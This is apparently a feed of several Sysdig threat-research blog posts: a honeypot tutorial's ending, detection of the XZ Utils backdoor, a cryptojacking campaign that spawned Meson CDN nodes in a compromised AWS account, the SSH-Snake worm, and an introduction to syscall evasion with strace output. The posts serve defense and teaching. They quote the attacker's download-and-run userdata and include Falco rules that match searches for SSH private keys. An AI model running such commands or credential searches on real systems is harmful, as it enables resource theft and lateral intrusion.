my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      1/1     Running   0          95s
ssh-0                                          1/1     Running   0          9m35s

$ kubectl get events -n vcluster | grep my-dummy-ssh

113s        Normal    falco-talon:kubernetes:terminate:success   pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Status: success...
113s        Normal    Scheduled                                  pod/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      Successfully assigned vcluster/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh to minikube
112s        Normal    Pulled                                     pod/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      Container image "docker.io/securecodebox/dummy-ssh:v1.0.0" already present on machine
112s        Normal    Created                                    pod/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      Created container dummy-ssh
112s        Normal    Started                                    pod/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      Started container dummy-ssh
8m28s       Normal    Scheduled                                  pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Successfully assigned vcluster/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh to minikube
8m27s       Normal    Pulling                                    pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Pulling image "docker.io/securecodebox/dummy-ssh:v1.0.0"
8m18s       Normal    Pulled                                     pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Successfully pulled image "docker.io/securecodebox/dummy-ssh:v1.0.0" in 9.611s (9.611s including waiting)
8m17s       Normal    Created                                    pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Created container dummy-ssh
8m16s       Normal    Started                                    pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Started container dummy-ssh
113s        Normal    Killing                                    pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Stopping container dummy-ssh

And there we have it, end to end. Here’s what we did:

  • Attacked the SSH server pod
  • Tripped the ‘Sensitive file opened for reading by non-trusted program’ rule in Falco
  • Used a webhook from Falcosidekick to Falco Talon to ship the events over
  • Tripped the ‘Sensitive file opened’ rule in Falco Talon
  • Terminated the offending pod

And Now With Slightly More Automation

All of that above was quite a few moving parts. Wouldn’t it be nice if we could just run a script to do all of this? Yes, yes it would. Fortunately, we can do just that.

In the Sysdig TRT GitHub repo, pull down the minhoney.sh file. You’ll want to set it executable. To fire up the honeypot, simply run the script with the --buildit argument:

$ ./minhoney.sh --buildit

To take everything back down again, run the script again with the --burnit argument.

$ ./minhoney.sh --burnit
NOTE: When run with –burnit, the script will attempt to do some cleanup of things that may cause problems with future runs. It will uninstall anything in helm, kill off everything in minikube, and delete everything out of /tmp that the current user has permissions to delete. It is NOT recommended that you run this on anything other than a system or instance built for this specific purpose. Don’t say we didn’t warn you, cause we totally warned you.  

That’s All (for Now) Folks

If we take a step back to see everything we have explained, there we have it, end to end:

  • Attack the SSH server pod
  • Activate the rule ‘Sensitive file open for reading by untrusted program’ in Falco
  • Used a webhook from Falcosidekick to Falco Talon to send the events
  • Enabled the ‘Sensitive file open’ rule in Falco Talon
  • Terminated the offending pod

In the next part of this series, we’ll add several additional pieces to this. Logging and alerting would be nice, as well as additional automation to set everything up. We’ll also scale this up with some additional targets to attack.

For the previous episode with the basics, see Building honeypots with vcluster and Falco: Episode I.

The post Building Honeypots with vcluster and Falco: Episode II appeared first on Sysdig.

]]>
CVE-2024-3094: Detecting the SSHD backdoor in XZ Utils https://sysdig.com/blog/cve-2024-3094-detecting-the-sshd-backdoor-in-xz-utils/ Fri, 29 Mar 2024 22:08:04 +0000 https://sysdig.com/?p=86402 On March 29th, 2024, a backdoor in a popular package called XZ Utils was announced on the Openwall mailing list....

The post CVE-2024-3094: Detecting the SSHD backdoor in XZ Utils appeared first on Sysdig.

]]>
On March 29th, 2024, a backdoor in a popular package called XZ Utils was announced on the Openwall mailing list. This utility includes a library called liblzma which is used by SSHD, a critical part of the Internet infrastructure used for remote access. When loaded, the CVE-2024-3094 affects the authentication of SSHD potentially allowing intruders access regardless of the method.

Affected versions: 5.6.0, 5.6.1

Affected Distributions: Fedora 41, Fedora Rawhide

*At the time of this writing

Background

A malicious threat actor was able to commit code to the XZ Utils Github repository on February 23, 2024 which included obfuscated malicious code that altered the build process. The altered build process then included the malicious file during compilation of the liblzma library, At no point was the malicious code in cleartext making it difficult to detect. A primary target of this attack is Linux distributions, as they will include the compiled version of the liblzma library which SSHD uses while also spread it to many users.

Once SSHD loads the now malicious library, the authentication flow is redirected during the RSA key checking. With control over the authentication flow, the library can grant access based on the criteria set by the attacker. This is most likely their RSA keys or some other data which only the attacker knows. None of the password or PKI based authentication would be effective at this point.

Detection

This malicious library can be detected by Vulnerability Management solutions which look for the affected packages installed. CVE-2024-3094 can also be detected at runtime using Falco or the Sysdig Secure CNAPP Platform. For runtime detection, one way to go about it is to watch for the loading of the malicious library by SSHD. These shared libraries often include the version in their filename. In the example below, here is what is loaded by SSHD in a test system.

SSHD is a daemon which is executed at startup, this can make detection tricky sometimes if the detection agent doesn’t load in time. However, when a user logs in with SSH a new SSHD process is spawned which also loads the affected libraries. This gives us two places where we can detect the loading of the shared library. Below is a Falco rule demonstrating how to do exactly that.

For Sysdig Secure users, this rule is called “Backdoored library loaded into SSHD (CVE-2024-3094)” and can be found in the Sysdig Runtime Threat Detection policy.

- rule: Backdoored library loaded into SSHD (CVE-2024-3094)

  desc: A version of the liblzma library was seen loading which was backdoored by a malicious user in order to bypass SSHD authentication.

  condition: open_read and proc.name=sshd and (fd.name endswith "liblzma.so.5.6.0" or fd.name endswith "liblzma.so.5.6.1")

  output: SSHD Loaded a vulnerable library (| file=%fd.name | proc.pname=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] image=%container.image.repository | proc.cmdline=%proc.cmdline | container.name=%container.name | proc.cwd=%proc.cwd proc.pcmdline=%proc.pcmdline user.name=%user.name user.loginuid=%user.loginuid user.uid=%user.uid user.loginname=%user.loginname image=%container.image.repository | container.id=%container.id | container_name=%container.name|  proc.cwd=%proc.cwd )

  priority: WARNING

 tags: [host,container]

Secure your cloud today with end-to-end detection

At the heart of Sysdig Secure lies Falco’s unified detection engine. This cutting‑edge engine leverages real‑time behavioral insights and threat intelligence to continuously monitor the multi‑layered infrastructure, identifying potential security breaches. Whether it’s anomalous container activities, unauthorized access attempts, supply chain vulnerabilities, or identity‑based threats, Sysdig ensures that organizations have a unified and proactive defense against evolving threats.

Dig deeper into how Sysdig provides continuous cloud security across AWS, GCP, and Azure.

Conclusion

Supply chain attacks are becoming increasingly common. As we saw in this attack against SSHD, the code made it past reviews and approvals. It was obfuscated in a way that didn’t raise any concerns. This is one of the drawbacks when it comes to relying on statically scanning source code. Runtime threat detection becomes a critical part of ensuring all of the components in your supply chain are operating as expected. It was very fortunate that the malicious library didn’t make it even into more distributions before it was caught.

The post CVE-2024-3094: Detecting the SSHD backdoor in XZ Utils appeared first on Sysdig.

]]>
Cloud Threats Deploying Crypto CDN https://sysdig.com/blog/cloud-threats-deploying-crypto-cdn/ Mon, 11 Mar 2024 14:22:26 +0000 https://sysdig.com/?p=85527 The Sysdig Threat Research Team (TRT) discovered a malicious campaign using the blockchain-based Meson service to reap rewards ahead of...

The post Cloud Threats Deploying Crypto CDN appeared first on Sysdig.

]]>
The Sysdig Threat Research Team (TRT) discovered a malicious campaign using the blockchain-based Meson service to reap rewards ahead of the crypto token unlock happening around March 15th. Within minutes, the attacker attempted to create 6,000 Meson Network nodes using a compromised cloud account. The Meson Network is a decentralized content delivery network (CDN) that operates in Web3 by establishing a streamlined bandwidth marketplace through a blockchain protocol.

In this article, we cover what happened in the observed attack, further explain what the Meson Network is, and describe how the attacker was able to use it to their advantage.

What Happened

On February 26th, the Sysdig TRT responded to suspicious alerts for multiple AWS users associated with exposed services within our honeynet infrastructure. The attacker exploited CVE-2021-3129 in a Laveral application and a misconfiguration in WordPress to gain initial access to the cloud account. Following initial access, the attacker used automated reconnaissance techniques to instantly uncover a lay of the land. They then used the privileges they identified for the compromised users to create a large number of EC2 instances.

The EC2 instances were created in the account using RunInstances with the following userdata. The userdata field allows for commands to be run when an EC2 instance starts. 

wget 'https://staticassets.meson.network/public/meson_cdn/v3.1.20/meson_cdn-linux-amd64.tar.gz' && tar -zxf meson_cdn-linux-amd64.tar.gz && rm -f meson_cdn-linux-amd64.tar.gz && cd ./meson_cdn-linux-amd64 && sudo ./service install meson_cdn
sudo ./meson_cdn config set --token=**** --https_port=443 --cache.size=30
sudo ./service start meson_cdn

The commands shown above download the meson_cdn binary and run it as a service. This code can be found in the official Meson network documentation.

Analysis of the Cloudtrail logs showed the attacker came from a single IP Address 13[.]208[.]251[.]175. The compromised account experienced malicious activity across many AWS regions. The attacker used a public AMI (Ubuntu 22.04) and spawned multiple batches of 500 micro-sized instances per region, as reported in the following log. We had a limit set on the account for new EC2 creation to only micro-sized instances, otherwise we’re sure the attacker would have certainly preferred larger, more expensive instances. 

"eventTime": "2024-02-26T20:33:10Z",
    …
    "userAgent": "Boto3/1.34.49 md/Botocore#1.34.49 ua/2.0 os/linux#6.2.0-1017-aws md/arch#x86_64 lang/python#3.10.12 md/pyimpl#CPython cfg/retry-mode#legacy Botocore/1.34.49 Resource",
    "requestParameters": {
        "instancesSet": {
            "items": [
                {
                    "imageId": "ami-0a2e7efb4257c0907",
                    "minCount": 500,
                    "account": 500
                }

Within minutes, the attacker was able to spawn almost 6,000 instances inside the compromised account across multiple regions and execute the meson_cdn binary. This comes at a huge cost for the account owner. As a result of the attack, we estimate a cost of more than $2,000 per day for all the Meson network nodes created, even just using micro sizes. This isn’t counting the potential costs for public IP addresses which could run as much as $22,000 a month for 6,000 nodes! Estimating the reward tokens amount and value the attacker could earn is difficult since those Meson tokens haven’t had values set yet in the public market.

Looking inside one of the instances created, we can see the meson_cdn process started correctly using the default configuration.

cat default.toml 

end_point = "https://cdn.meson.network"

https_port = 443

token = "ami-03f4878755434977f"

[cache]

  folder = "./m_cache"

  size = 30

[log]

  level = "INFO"

While monitoring the meson_cdn process’s system calls it’s possible to find the file exchanged between the CDN. As you can see in the screenshot below of system calls, a file has been created containing an image.

Checking the files created in the m_cache folder, we can find different content like image and messages like:

{"name":"GAS#30","description":"{GAS} - {GOLDAPESQUAD} - RARITIES INCLUDED, LAYERS ON LAYERS, COME TO DISCORD TO SHOW OFF YOUR APE!","image":"<a href="https://nftstorage.link/ipfs/bafybeicr3csbrrdo2h3g27ddu3sfppwzdfrufzpwm24qcmzbmy6jjuzydy/72">https://nftstorage.link/ipfs/bafybeicr3csbrrdo2h3g27ddu3sfppwzdfrufzpwm24qcmzbmy6jjuzydy/72</a>","attributes":[{"trait_type":"APE PICS","value":"Download (82)"},{"trait_type":"BACKPICS","value":"Ai(4)"},{"trait_type":"Rarity Rank","value":363,"display_type":"number"}],"properties":{"files":[{"uri":"<a href="https://nftstorage.link/ipfs/bafybeicr3csbrrdo2h3g27ddu3sfppwzdfrufzpwm24qcmzbmy6jjuzydy/72">https://nftstorage.link/ipfs/bafybeicr3csbrrdo2h3g27ddu3sfppwzdfrufzpwm24qcmzbmy6jjuzydy/72</a>"}]}}

Contrary to what we expected, the Meson application used a relatively low percentage of memory and CPU usage compared to traditional crypto jacking incidents. To better understand why this is and why we are seeing image storage let’s dig deeper on what Meson Network actually does.

What is Web3 and the Meson Network

Meson Network is a blockchain project committed to creating an efficient bandwidth marketplace on Web3, using a blockchain protocol model to replace the traditional cloud storage solutions like Google Drive or Amazon S3 which are more expensive and have privacy limitations.

For those who are not familiar with Web3, it is presented as an upgrade to its precursors: web 1.0 and 2.0. This new concept of a new decentralized internet is based on blockchain network, cryptocurrencies, and NFTs and claims to prioritize decentralization, redistributing ownership to users and creators for a fairer digital landscape.

To accomplish this goal, Web3 requires some basic conditions:

  • bandwidth to let the entire network be efficient 
  • storage to achieve decentralization

In this attack, we don’t talk about crypto mining in the traditional terms of memory or CPU cycles usage, but rather bandwidth and storage in return for Meson Network Tokens (MSN). The Meson documentation gives this explanation:

Mining Score = Bandwidth Score * Storage Score * Credit Score

This means miners will receive Meson tokens as a reward for providing servers to the Meson Network platform, and the reward will be calculated based on the amount of bandwidth and storage brought into the network. 

Going back to what we observed during the attack, this explains why the attack didn’t result in the usual massive amount of CPU being used but instead a huge number of connections.

New trend, new threats

The fact that Meson network is getting some hype in the blockchain world isn’t a mystery after Initial Coin Offerings (ICO) happened Feb 8th 2024. As we saw, it is the perfect time for mining to inject liquidity and bring interest into a new coin. 

The Sysdig TRT monitored a spike in images pushed on dockerhub recently related to Meson network and related features, reinforcing the interest in this service. One of the container images on DockerHub we analyzed is wawaitech/meson was created around 1 month ago and runs gaganode, a Meson network product related to decentralized edge cloud computing.

The image looks legitimate and safe from a static point of view, which involves analyzing its layers and vulnerabilities. However, during runtime execution, we monitored outbound network traffic and we spotted gaganode being executed and performing connections to malicious IPs.

Same old cryptomining attack?

Yes and no. Attackers still want to use your resources for their goal and that hasn’t changed at all. What is different is the resources requested. For Meson, the attacker is more interested in storage space and high bandwidth instead of high performance CPUs. This can be achieved with a large number of small instances but with a good amount of storage.

Thanks to the ease of scalability in the cloud, spawning a large amount of resources is trivial and it can be done very quickly across multiple regions. Attackers can have their own CDNs ready in minutes and for free (to them)!

Detection

Knowing the differences between the usual miners we are used to seeing, you may wonder if the usual detection is still effective. 

While usual miners are detectable looking spikes on CPU usage, as we saw this won’t be the case. However we can still monitor other resources like instance storage space and connections. A spike in traffic usage and storage would be a red flag you should carefully look into.

Talking about runtime detection, using Falco we could monitor outbound connections done by the host. The following Falco rules can help in detecting those malicious behaviors.

- rule: Unexpected outbound connection destination

  desc: Detect any outbound connection to a destination outside of an allowed set of ips, networks, or domain names

  condition: >

    consider_all_outbound_conns and outbound

  output: Disallowed outbound connection destination (proc.cmdline=%proc.cmdline connection=%fd.name user.name=%user.name user.loginuid=%user.loginuid proc.pid=%proc.pid proc.cwd=%proc.cwd proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline proc.sid=%proc.sid)

  priority: NOTICE

Looking at cloud events instead, you could monitor instances created in the cloud. The following rule for Cloudtrail can help monitor RunInstances events.

- rule: Run Instances

  desc: Detect launching of a specified number of instances.

  condition: >

ct.name="RunInstances" and not ct.error exists

  output: A number of instances have been launched on zones %ct.request.availabilityzone with subnet ID %ct.request.subnetid by user %ct.user on region %ct.region (requesting user=%ct.user, requesting IP=%ct.srcip, account ID=%ct.user.accountid, AWS region=%ct.region, arn=%ct.user.arn, availability zone=%ct.request.availabilityzone, subnet id=%ct.request.subnetid, reservation id=%ct.response.reservationid)

  priority: WARNING

  source: awscloudtrail

Another detection perspective might be monitoring unused AWS regions where commands aren’t executed. To properly use the following rules without noise, the list disallowed_aws_regions needs to be properly customized adding the unused regions in your account.

- rule: AWS Command Executed on Unused Region

  desc: Detect AWS command execution on unused regions.

  condition: >

not ct.error exists and ct.region in (disallowed_aws_regions)

   output: An AWS command of source %ct.src and name %ct.name has been executed by an untrusted user %ct.user on an unused region=%ct.region (requesting user=%ct.user, requesting IP=%ct.srcip, account ID=%ct.user.accountid, AWS region=%ct.region)

  priority: CRITICAL

  source: awscloudtrail

Conclusion

Attackers are continuing to diversify their income streams through new ways of leveraging compromised assets. It isn’t all about mining cryptocurrency anymore. Services like Meson network want to leverage hard drive space and network bandwidth instead of CPU.  While Meson may be a legitimate service, this shows that attackers are always on the lookout for new ways to make money. 

In order to prevent your resources from getting wrapped up in one of these attacks and having to shell out thousands of dollars for resource consumption, it is critical to keep your software up to date and monitor your environments for suspicious activity. 

The post Cloud Threats Deploying Crypto CDN appeared first on Sysdig.

]]>
SSH-Snake: New Self-Modifying Worm Threatens Networks https://sysdig.com/blog/ssh-snake/ Tue, 20 Feb 2024 19:00:00 +0000 https://sysdig.com/?p=84542 The Sysdig Threat Research Team (TRT) discovered the malicious use of a new network mapping tool called SSH-Snake that was...

The post SSH-Snake: New Self-Modifying Worm Threatens Networks appeared first on Sysdig.

]]>
The Sysdig Threat Research Team (TRT) discovered the malicious use of a new network mapping tool called SSH-Snake that was released on 4 January 2024. SSH-Snake is a self-modifying worm that leverages SSH credentials discovered on a compromised system to start spreading itself throughout the network. The worm automatically searches through known credential locations and shell history files to determine its next move. SSH-Snake is actively being used by threat actors in offensive operations. 

SSH-Snake activity can be identified by a runtime threat detection tool, such as Sysdig Secure or Open Source Falco.  At the end of this post are several Falco rules which can be used to detect this threat.

Traditional SSH Worms

One of the most commonly seen tactics after an attacker gains access to a system is the discovery of other targets and an attempt to reach them, known as lateral movement

In previous research, we identified a worm that looked for SSH credentials hosted on the system that could be used to connect to another system and the process repeated. The image below is an example of what was used within the LABRAT dropper.

SSH-Snake

SSH-Snake takes this lateral movement concept to another level by being more thorough in its discovery of private keys. By avoiding the easily detectable patterns associated with scripted attacks, this new tool provides greater stealth, flexibility, configurability and more comprehensive credential discovery than typical SSH worms, therefore being more efficient and successful.

SSH-Snake

From the README:

“🐍 SSH-Snake is a powerful tool designed to perform automatic network traversal using SSH private keys discovered on systems, with the objective of creating a comprehensive map of a network and its dependencies, identifying to what extent a network can be compromised using SSH and SSH private keys starting from a particular system.”

SSH-Snake is a bash shell script which autonomously searches the system it is run on for SSH credentials. Once credentials are found, the script attempts to log into the target system and then copies itself there in order to repeat the process. The results of the worm’s activity are available to the attacker who can use them later in order to continue their operations.

Self-Modifying and Fileless

A unique aspect of SSH-Snake is that it modifies itself when it is first run in order to make itself smaller. All comments, whitespace, and unnecessary functions are removed. This is done out of necessity due to the way the shell script passes arguments and allows it to remain fileless. Compared to previous SSH worms, its initial form is much larger due to the expanded functionality and reliability.

The script is essentially plug-and-play, but easily customizable to your use case. You can disable and enable different parts of it, including the different strategies used to discover private keys and the destinations those private keys may be used to connect to. Unlike traditional scripts, SSH-Snake is designed to work on any device. It’s completely self-replicating and self-propagating — and completely fileless.

Collection

SSH-Snake searches for multiple types of private keys located on the target system using a variety of methods. Below is a snippet of code showing where SSH-Snake looks for keys. As you can see, it looks at sources of information, including last and arp to gather target data. 

One of the most interesting features is find_from_bash_history, where commands of ssh, scp, and rsync are searched for and parsed. These entries contain a wealth of knowledge in relation to private key locations, credentials, and targets. For a full explanation of how SSH-Snake works, the author wrote an article where he explains it in depth.

Operational Use

Sysdig TRT uncovered the command and control (C2) server of threat actors deploying SSH-Snake. This server holds a repository of files containing the output of SSH-Snake for each of the targets they have gained access to. 

Filenames found on the C2 server contain IP addresses of victims, which allowed us to make a high confidence assessment that these threat actors are actively exploiting known Confluence vulnerabilities in order to gain initial access and deploy SSH-Snake. This does not preclude other exploits from being used, but many of the victims are running Confluence.  

Output of SSH-Snake contains the credentials found, the IPs of the targets, and the bash history of the victims. We are witnessing the victim list growing, which means that this is an ongoing operation. At the time of writing, the number of victims is approximately 100.

Detecting SSH-Snake with Falco

Falco, an incubating project under the CNCF, provides real-time detection alerts of unusual activities in cloud-native environments. Users have the option to implement the default Falco rules within Falco or create their own custom rules using its straightforward and adaptable language.

Falco can be used to detect the use of SSH-Snake in the runtime using default rules that can detect the use of SSH-Snake in runtime, but you can also modify or craft new ones if you want to improve the detection. The default Falco Rules that trigger when SSH-Snake is run on the tool would be:

- rule: Disallowed SSH connection
  desc: Detect any new SSH connection on port 22 to a host other than those in an allowed list of hosts.  This rule absolutely requires profiling your environment beforehand.
  Condition: >
inbound_outbound  
and ssh_port  
and not allowed_ssh_hosts
Output: Disallowed SSH Connection (connection=%fd.name lport=%fd.lport rport=%fd.rport fd_type=%fd.type fd_proto=fd.l4proto evt_type=%evt.type user=%user.name user_uid=%user.uid user_loginuid=%user.loginuid process=%proc.name proc_exepath=%proc.exepath parent=%proc.pname command=%proc.cmdline terminal=%proc.tty %container.info)
  priority: NOTICE

Availability: Falco OSS, Sysdig Rule Library

- rule: Read sensitive file trusted after startup
  condition: > 
    open_read 
    and sensitive_files 
    and server_procs 
    and not proc_is_new 
    and proc.name!="sshd" 
    and not user_known_read_sensitive_files_activities
  output: Sensitive file opened for reading by trusted program after startup (file=%fd.name pcmdline=%proc.pcmdline gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] evt_type=%evt.type user=%user.name user_uid=%user.uid user_loginuid=%user.loginuid process=%proc.name proc_exepath=%proc.exepath parent=%proc.pname command=%proc.cmdline terminal=%proc.tty %container.info)
  priority: WARNING

Availability: Falco OSS, Sysdig Runtime Notable Events (Sysdig Secure Policy)

- rule: System user interactive
  condition: > 
    spawned_process 
    and system_users 
    and interactive 
    and not user_known_system_user_login
  output: System user ran an interactive command (evt_type=%evt.type user=%user.name user_uid=%user.uid user_loginuid=%user.loginuid process=%proc.name proc_exepath=%proc.exepath parent=%proc.pname command=%proc.cmdline terminal=%proc.tty exe_flags=%evt.arg.flags %container.info)
  priority: INFO

Availability: Falco OSS, Sysdig Runtime Notable Events (Sysdig Secure Policy)

- rule: Search Private Keys or Passwords
  condition: >
    (spawned_process and
    ((grep_commands and private_key_or_password) or
    (proc.name = "find" and (proc.args contains "id_rsa" or proc.args contains "id_dsa" or proc.args contains "id_ed25519" or proc.args contains "id_ecdsa" or (services_credentials_files))))
  output: Grep private keys or passwords activities detected on %container.name with cmdline %proc.cmdline and parent %proc.pname under user %user.name
  priority: WARNING

Availability: Falco OSS, Sysdig Runtime Threat Detection (Sysdig Secure Policy)

Secure your cloud today with end-to-end detection

At the heart of Sysdig Secure lies Falco’s unified detection engine. This cutting‑edge engine leverages real‑time behavioral insights and threat intelligence to continuously monitor the multi‑layered infrastructure, identifying potential security breaches. Whether it’s anomalous container activities, unauthorized access attempts, supply chain vulnerabilities, or identity‑based threats, Sysdig ensures that organizations have a unified and proactive defense against evolving threats.

Dig deeper into how Sysdig provides continuous cloud security across Runtime, AWS, GCP, and Azure.

Conclusion

SSH-Snake is an evolutionary step in the malware commonly deployed by threat actors. It is smarter and more reliable which will allow threat actors to reach farther into a network once they gain a foothold. The usage of SSH keys is a recommended practice that SSH-Snake tries to take advantage of in order to spread. It is also fileless, which can make static detection difficult.

That’s why a runtime solution, such as Sysdig Secure and Falco, are necessary. Detecting attacks as soon as they happen allows you to speed up the investigation process and will keep your exposure to a minimum.

The post SSH-Snake: New Self-Modifying Worm Threatens Networks appeared first on Sysdig.

]]>
Exploring Syscall Evasion – Linux Shell Built-ins https://sysdig.com/blog/exploring-syscall-evasion/ Wed, 14 Feb 2024 15:15:00 +0000 https://sysdig.com/?p=84306 This is the first article in a series focusing on syscall evasion as a means to work around detection by...

The post Exploring Syscall Evasion – Linux Shell Built-ins appeared first on Sysdig.

]]>
This is the first article in a series focusing on syscall evasion as a means to work around detection by security tools and what we can do to combat such efforts. We’ll be starting out the series discussing how this applies to Linux operating systems, but this is a technique that applies to Windows as well, and we’ll touch on some of this later on in the series. 

In this particular installment, we’ll be discussing syscall evasion with bash shell builtins. If you read that and thought “what evasion with bash what now?”, that’s ok. We’ll walk through it from the beginning. 

What is a Syscall?

System calls, commonly referred to as syscalls, are the interface between user-space applications and the kernel, which, in turn, talks to the rest of our resources, including files, networks, and hardware. Basically, we can consider syscalls to be the gatekeepers of the kernel when we’re looking at things from a security perspective.

Many security tools (Falco included) that watch for malicious activity taking place are monitoring syscalls going by. This seems like a reasonable approach, right? If syscalls are the gatekeepers of the kernel and we watch the syscalls with our security tool, we should be able to see all of the activity taking place on the system. We’ll just watch for the bad guys doing bad things with bad syscalls and then we’ll catch them, right? Sadly, no.

There is a dizzying array of syscalls, some of which have overlapping sets of functionality. For instance, if we want to open a file, there is a syscall called open() and we can look at the documentation for it here. So if we have a security tool that can watch syscalls going by, we can just watch for the open() syscall and we should be all good for monitoring applications trying to open files, right? Well, sort of.

If we look at the synopsis in the open() documentation:

Syscall Evasion

As it turns out, there are several syscalls that we could be using to open our file: open(), creat(), openat(), and openat2(), each of which have a somewhat different set of behaviors. For example, the main difference between open() and openat() is that the path for the file being opened by openat() is considered to be relative to the current working directory, unless an absolute path is specified. Depending on the operating system being used, the application in question, and what it is doing relative to the file, we may see different variations of the open syscalls taking place. If we’re only watching open(), we may not see the activity that we’re looking for at all.

Generally, security tools watch for the execve() syscall, which is one syscall indicating process execution taking place (there are others of a similar nature such as execveat(), clone(), and fork()). This is a safer thing to watch from a resource perspective, as it doesn’t take place as often as some of the other syscalls. This is also where most of the interesting activity is taking place. Many of the EDR-like tools watch this syscall specifically. As we’ll see here shortly, this is not always the best approach. 

There aren’t any bad syscalls we can watch, they’re all just tools. Syscalls don’t hack systems, people with syscalls hack systems. There are many syscalls to watch and a lot of different ways they can be used. On Linux, one of the common methods of interfacing with the OS is through system shells, such as bash and zsh. 

NOTE:If you want to see a complete* list of syscalls, take a gander at the documentation on syscall man page here. This list also shows where syscalls are specific to certain architectures or have been deprecated. *for certain values of complete

Examining Syscalls

Now that we have some ideas of what syscalls are, let’s take a quick look at some of them in action. On Linux, one of the primary tools for examining syscalls as they happen is strace. There are a few other tools we can use for this (including the open source version of Sysdig), which we will discuss at greater length in future articles. The strace utility allows us to snoop on syscalls as they’re taking place, which is exactly what we want when we’re trying to get a better view of what exactly is happening when a command executes. Let’s try this out:

1 – We’re going to make a new directory to perform our test in, then use touch to make a file in it. This will help minimize what we get back from strace, but it will still return quite a bit.

5 – Then, we’ll run strace and ask it to execute the ls command. Bear in mind that this is the output of a very small and strictly bounded test where we aren’t doing much. With a more complex set of commands, we would see many, many more syscalls. 

7 – Here, we can see the execve() syscall and the ls command being executed. This particular syscall is often the one monitored for by various detection tools as it indicates program execution. Note that there are a lot of other syscalls happening in our example, but only one execve()

8 – From here on down, we can see a variety of syscalls taking place in order to support the ls command being executed. We won’t dig too deeply into the output here, but we can see various libraries being used, address space being mapped, bytes being read and written, etc.

$ mkdir test
$ cd test/
$ touch testfile

$ strace ls

execve("/usr/bin/ls", ["ls"], 0x7ffcb7920d30 /* 54 vars */) = 0
brk(NULL)                               = 0x5650f69b7000
arch_prctl(0x3001 /* ARCH_??? */, 0x7fff2e5ae540) = -1 EINVAL (Invalid argument)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f07f9f63000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=61191, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 61191, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f07f9f54000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libselinux.so.1", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\0\0\0\0\0\0\0"..., 832) = 832
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=166280, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 177672, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f07f9f28000
mprotect(0x7f07f9f2e000, 139264, PROT_NONE) = 0
mmap(0x7f07f9f2e000, 106496, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6000) = 0x7f07f9f2e000
mmap(0x7f07f9f48000, 28672, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x20000) = 0x7f07f9f48000
mmap(0x7f07f9f50000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x27000) = 0x7f07f9f50000
mmap(0x7f07f9f52000, 5640, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f07f9f52000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P\237\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0 \0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0"..., 48, 848) = 48
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0 =\340\2563\265?\356\25x\261\27\313A#\350"..., 68, 896) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=2216304, ...}, AT_EMPTY_PATH) = 0
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 2260560, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f07f9c00000
mmap(0x7f07f9c28000, 1658880, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x28000) = 0x7f07f9c28000
mmap(0x7f07f9dbd000, 360448, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1bd000) = 0x7f07f9dbd000
mmap(0x7f07f9e15000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x214000) = 0x7f07f9e15000
mmap(0x7f07f9e1b000, 52816, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f07f9e1b000
